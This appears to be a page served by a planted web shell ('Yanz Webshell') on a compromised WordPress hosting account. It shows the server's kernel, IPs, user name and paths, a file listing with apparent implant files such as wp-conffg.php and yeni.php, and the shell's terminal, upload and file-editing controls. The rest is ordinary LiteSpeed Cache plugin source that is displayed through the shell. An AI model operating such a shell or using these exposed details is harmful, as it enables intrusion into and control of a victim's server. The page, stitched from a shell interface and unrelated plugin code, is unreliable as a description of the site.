Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-05 05:17:00
3907.15 GB Free: 1074.57 GB (27%)
/home/repauqkb/public_html/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.216.147
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-05 02:30:18drwxr-x---Rename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-05 01:36:32drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-05 01:36:38drwxr-xr-xRename Touch
.hcflag31 B2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
.htaccess626 B2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
.htaccess.bk243 B2026-04-28 01:30:21-rw-r--r--Rename Touch Edit Download
.litespeed_flag297 B2026-05-05 01:36:06-rw-r--r--Rename Touch Edit Download
error_log4.87 MB2026-05-05 05:17:00-rw-r--r--Rename Touch Edit Download
goods.php173.77 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
index.php16.36 KB2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
options-privacy-more.php768 B2025-06-24 17:01:07-rw-r--r--Rename Touch Edit Download
qinfofuns.php12.90 KB2026-04-23 18:25:11-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-conffg.php122.70 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wper.php16.31 KB2026-01-27 01:19:39-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
yeni.php27.21 KB2026-04-23 17:49:33-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
$ pwd: /home/repauqkb/www/wp-content/plugins/litespeed-cache/src/
Upload Files
File: /home/repauqkb/www/wp-content/plugins/litespeed-cache/src/cloud-auth-callback.trait.php
<?php
/**
 * Cloud auth callback trait
 *
 * @package LiteSpeed
 * @since 7.8
 */

namespace LiteSpeed;

defined( 'WPINC' ) || exit();

/**
 * Trait Cloud_Auth_Callback
 *
 * Handles QUIC.cloud activation callbacks, status updates, and cryptographic operations.
 */
trait Cloud_Auth_Callback {

	/**
	 * Encrypt data for cloud req
	 *
	 * @since 7.0
	 *
	 * @param string|int $data Data to sign.
	 * @return string|false
	 */
	private function _sign_b64( $data ) {
		if ( empty( $this->_summary['sk_b64'] ) ) {
			self::debugErr( 'No sk to sign.' );
			return false;
		}
		$sk = base64_decode( $this->_summary['sk_b64'] ); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
		if ( strlen( $sk ) !== SODIUM_CRYPTO_SIGN_SECRETKEYBYTES ) {
			self::debugErr( 'Invalid local sign sk length.' );
			// Reset local pk/sk
			unset( $this->_summary['pk_b64'] );
			unset( $this->_summary['sk_b64'] );
			$this->save_summary();
			self::debug( 'Clear local sign pk/sk pair.' );

			return false;
		}
		$signature = sodium_crypto_sign_detached( (string) $data, $sk );
		return base64_encode( $signature ); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_encode
	}

	/**
	 * Load server pk from cloud
	 *
	 * @since 7.0
	 *
	 * @param bool $from_wpapi Load from WP API server.
	 * @return string|false Binary public key or false.
	 */
	private function _load_server_pk( $from_wpapi = false ) {
		// Load cloud pk
		$server_key_url = $this->_cloud_server . '/' . self::API_SERVER_KEY_SIGN;
		if ( $from_wpapi ) {
			$server_key_url = $this->_cloud_server_wp . '/' . self::API_SERVER_KEY_SIGN;
		}
		$resp = wp_safe_remote_get( $server_key_url );
		if ( is_wp_error( $resp ) ) {
			self::debugErr( 'Failed to load key: ' . $resp->get_error_message() );
			return false;
		}
		$pk = trim( $resp['body'] );
		self::debug( 'Loaded key from ' . $server_key_url . ': ' . $pk );
		$cloud_pk = base64_decode( $pk ); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
		if ( strlen( $cloud_pk ) !== SODIUM_CRYPTO_SIGN_PUBLICKEYBYTES ) {
			self::debugErr( 'Invalid cloud public key length.' );
			return false;
		}

		$sk = base64_decode( $this->_summary['sk_b64'] ); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
		if ( strlen( $sk ) !== SODIUM_CRYPTO_SIGN_SECRETKEYBYTES ) {
			self::debugErr( 'Invalid local secret key length.' );
			// Reset local pk/sk
			unset( $this->_summary['pk_b64'] );
			unset( $this->_summary['sk_b64'] );
			$this->save_summary();
			self::debug( 'Unset local pk/sk pair.' );

			return false;
		}

		return $cloud_pk;
	}

	/**
	 * WPAPI echo back to notify the sealed databox
	 *
	 * @since 7.0
	 */
	public function wp_rest_echo() {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		self::debug( 'Parsing echo', $_POST );

		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$ts = !empty( $_POST['wpapi_ts'] ) ? sanitize_text_field( wp_unslash( $_POST['wpapi_ts'] ) ) : '';
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$sig = !empty( $_POST['wpapi_signature_b64'] ) ? sanitize_text_field( wp_unslash( $_POST['wpapi_signature_b64'] ) ) : '';

		if ( empty( $ts ) || empty( $sig ) ) {
			return self::err( 'No echo data' );
		}

		$is_valid = $this->_validate_signature( $sig, $ts, true );
		if ( ! $is_valid ) {
			return self::err( 'Data validation from WPAPI REST Echo failed' );
		}

		$diff = time() - (int) $ts;
		if ( abs( $diff ) > 86400 ) {
			self::debugErr( 'WPAPI echo data timeout [diff] ' . $diff );
			return self::err( 'Echo data expired' );
		}

		$signature_b64 = $this->_sign_b64( $ts );
		self::debug( 'Response to echo [signature_b64] ' . $signature_b64 );
		return self::ok( [ 'signature_b64' => $signature_b64 ] );
	}

	/**
	 * Validate cloud data
	 *
	 * @since 7.0
	 *
	 * @param string $signature_b64 Base64 signature.
	 * @param string $data          Data to validate.
	 * @param bool   $from_wpapi    Whether the signature is from WP API server.
	 * @return bool
	 */
	private function _validate_signature( $signature_b64, $data, $from_wpapi = false ) {
		// Try validation
		try {
			$cloud_pk = $this->_load_server_pk( $from_wpapi );
			if ( ! $cloud_pk ) {
				return false;
			}
			$signature = base64_decode( $signature_b64 ); // phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
			$is_valid  = sodium_crypto_sign_verify_detached( $signature, (string) $data, $cloud_pk );
		} catch ( \SodiumException $e ) {
			self::debugErr( 'Decryption failed: ' . esc_html( $e->getMessage() ) );
			return false;
		}
		self::debug( 'Signature validation result: ' . ( $is_valid ? 'true' : 'false' ) );
		return $is_valid;
	}

	/**
	 * Finish qc activation after redirection back from QC
	 *
	 * @since 7.0
	 *
	 * @param string|false $ref Ref slug.
	 */
	public function finish_qc_activation( $ref = false ) {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.NonceVerification.Recommended
		$qc_activated = !empty( $_GET['qc_activated'] ) ? sanitize_text_field( wp_unslash( $_GET['qc_activated'] ) ) : '';
		// phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.NonceVerification.Recommended
		$qc_ts = !empty( $_GET['qc_ts'] ) ? sanitize_text_field( wp_unslash( $_GET['qc_ts'] ) ) : '';
		// phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.NonceVerification.Recommended
		$qc_sig = !empty( $_GET['qc_signature_b64'] ) ? sanitize_text_field( wp_unslash( $_GET['qc_signature_b64'] ) ) : '';

		if ( ! $qc_activated || ! $qc_ts || ! $qc_sig ) {
			return;
		}

		$data_to_validate_signature = [
			'wp_pk_b64' => $this->_summary['pk_b64'],
			'qc_ts'     => $qc_ts,
		];
		$is_valid                   = $this->_validate_signature( $qc_sig, implode( '', $data_to_validate_signature ) );
		if ( ! $is_valid ) {
			self::debugErr( 'Failed to validate qc activation data' );
			Admin_Display::error( sprintf( __( 'Failed to validate %s activation data.', 'litespeed-cache' ), 'QUIC.cloud' ) );
			return;
		}

		self::debug( 'QC activation status: ' . $qc_activated );
		if ( ! in_array( $qc_activated, [ 'anonymous', 'linked', 'cdn' ], true ) ) {
			self::debugErr( 'Failed to parse qc activation status' );
			Admin_Display::error( sprintf( __( 'Failed to parse %s activation status.', 'litespeed-cache' ), 'QUIC.cloud' ) );
			return;
		}

		$diff = time() - (int) $qc_ts;
		if ( abs( $diff ) > 86400 ) {
			self::debugErr( 'QC activation data timeout [diff] ' . $diff );
			Admin_Display::error( sprintf( __( '%s activation data expired.', 'litespeed-cache' ), 'QUIC.cloud' ) );
			return;
		}

		// phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.NonceVerification.Recommended
		$main_domain = ! empty( $_GET['main_domain'] ) ? sanitize_text_field( wp_unslash( $_GET['main_domain'] ) ) : false;
		$this->update_qc_activation( $qc_activated, $main_domain );

		wp_safe_redirect( $this->_get_ref_url( $ref ) );
		exit;
	}

	/**
	 * Finish qc activation process
	 *
	 * @since 7.0
	 *
	 * @param string      $qc_activated Activation status.
	 * @param string|bool $main_domain  Main domain.
	 * @param bool        $quite        Quiet flag.
	 */
	public function update_qc_activation( $qc_activated, $main_domain = false, $quite = false ) {
		$this->_summary['qc_activated'] = $qc_activated;
		if ( $main_domain ) {
			$this->_summary['main_domain'] = $main_domain;
		}
		$this->save_summary();

		$msg = sprintf( __( 'Congratulations, %s successfully set this domain up for the anonymous online services.', 'litespeed-cache' ), 'QUIC.cloud' );
		if ( 'linked' === $qc_activated ) {
			$msg = sprintf( __( 'Congratulations, %s successfully set this domain up for the online services.', 'litespeed-cache' ), 'QUIC.cloud' );
			// Sync possible partner info
			$this->sync_usage();
		}
		if ( 'cdn' === $qc_activated ) {
			$msg = sprintf( __( 'Congratulations, %s successfully set this domain up for the online services with CDN service.', 'litespeed-cache' ), 'QUIC.cloud' );
			// Turn on CDN option
			$this->cls( 'Conf' )->update_confs( [ self::O_CDN_QUIC => true ] );
		}
		if ( ! $quite ) {
			Admin_Display::success( '🎊 ' . $msg );
		}

		$this->_clear_reset_qc_reg_msg();

		$this->clear_cloud();
	}

	/**
	 * Update QC status
	 *
	 * @since 7.0
	 */
	public function update_cdn_status() {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$qc_activated = !empty( $_POST['qc_activated'] ) ? sanitize_text_field( wp_unslash( $_POST['qc_activated'] ) ) : '';

		if ( !$qc_activated || ! in_array( $qc_activated, [ 'anonymous', 'linked', 'cdn', 'deleted' ], true ) ) {
			return self::err( 'lack_of_params' );
		}

		self::debug( 'update_cdn_status request hash: ' . $qc_activated );

		if ( 'deleted' === $qc_activated ) {
			$this->_reset_qc_reg();
		} else {
			$this->_summary['qc_activated'] = $qc_activated;
			$this->save_summary();
		}

		if ( 'cdn' === $qc_activated ) {
			$msg = sprintf( __( 'Congratulations, %s successfully set this domain up for the online services with CDN service.', 'litespeed-cache' ), 'QUIC.cloud' );
			Admin_Display::success( '🎊 ' . $msg );
			$this->_clear_reset_qc_reg_msg();
			// Turn on CDN option
			$this->cls( 'Conf' )->update_confs( [ self::O_CDN_QUIC => true ] );
			$this->cls( 'CDN\Quic' )->try_sync_conf( true );
		}

		return self::ok( [ 'qc_activated' => $qc_activated ] );
	}

	/**
	 * Clear QC linked status
	 *
	 * @since 5.0
	 */
	private function _reset_qc_reg() {
		unset( $this->_summary['qc_activated'] );
		if ( ! empty( $this->_summary['partner'] ) ) {
			unset( $this->_summary['partner'] );
		}
		self::save_summary();

		$msg = $this->_reset_qc_reg_content();
		Admin_Display::error( $msg, false, true );
	}

	/**
	 * Build reset QC registration content.
	 *
	 * @since 7.0
	 * @return string
	 */
	private function _reset_qc_reg_content() {
		$msg  = __( 'Site not recognized. QUIC.cloud deactivated automatically. Please reactivate your QUIC.cloud account.', 'litespeed-cache' );
		$msg .= Doc::learn_more( admin_url( 'admin.php?page=litespeed' ), __( 'Click here to proceed.', 'litespeed-cache' ), true, false, true );
		$msg .= Doc::learn_more( 'https://docs.litespeedtech.com/lscache/lscwp/general/', false, false, false, true );
		return $msg;
	}

	/**
	 * Clear reset QC reg msg if exist
	 *
	 * @since 7.0
	 */
	private function _clear_reset_qc_reg_msg() {
		self::debug( 'Removed pinned reset QC reg content msg' );
		$msg = $this->_reset_qc_reg_content();
		Admin_Display::dismiss_pin_by_content( $msg, Admin_Display::NOTICE_RED, true );
	}
}
@ Telegram